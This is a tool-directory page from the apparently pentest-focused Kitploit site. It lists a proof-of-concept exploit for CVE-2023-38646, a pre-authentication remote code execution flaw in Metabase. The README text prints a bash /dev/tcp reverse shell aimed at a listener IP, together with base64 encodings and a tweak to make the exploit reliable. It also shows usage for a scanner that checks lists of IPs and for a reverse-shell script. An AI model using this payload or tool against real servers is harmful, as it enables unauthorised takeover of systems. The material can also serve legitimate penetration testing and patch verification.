Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-38646 — PoC exploit for CVE-2023-38646, a pre-authentication RCE in Metabase. Includes a reverse shell payload generator with base64 encoding fix for reliable exploitation. | Kitploit
Tools/GitHubGitHub/yxl2001/cve-2023-38646
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubyxl2001/cve-2023-38646

CVE-2023-38646

PoC exploit for CVE-2023-38646, a pre-authentication RCE in Metabase. Includes a reverse shell payload generator with base64 encoding fix for reliable exploitation.

View Repository
52 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-38646

Original script from securezeron

During testing, I found that the reverse shell generated by this POC failed due to the trailing '=' character after base64 encoding. I made a slight modification to fix this issue.

# Original reverse shell payload generation code
>>> base64.b64encode("bash -i >&/dev/tcp/10.10.14.59/8080 0>&1".encode()).decode()
'YmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjEwLjE0LjU5LzgwODAgMD4mMQ=='

# Modified reverse shell payload generation code without '='
>>> base64.b64encode("bash -i > &/dev/tcp/10.10.14.59/8080 0>&1 ".encode()).decode()
'YmFzaCAtaSA+ICYvZGV2L3RjcC8xMC4xMC4xNC41OS84MDgwIDA+JjEg'

Usage

└─# python CVE-2023-38646-POC.py -h                                                                           
usage: CVE-2023-38646-POC.py [-h] [--ip IP] [--list LIST]

Check setup token

options:
  -h, --help   show this help message and exit
  --ip IP      IP address
  --list LIST  Filename containing list of IP addresses
                                                                                                                    

└─# python CVE-2023-38646-Reverse-Shell.py -h                                                                 
usage: CVE-2023-38646-Reverse-Shell.py [-h] [--rhost RHOST] [--lhost LHOST] [--lport LPORT]

Check setup token

options:
  -h, --help     show this help message and exit
  --rhost RHOST  Metabase server IP address (including http:// or https:// and port number if needed)
  --lhost LHOST  Listener IP address
  --lport LPORT  Listener port (default is 4444)

For more vulnerability information, see https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

Download Tool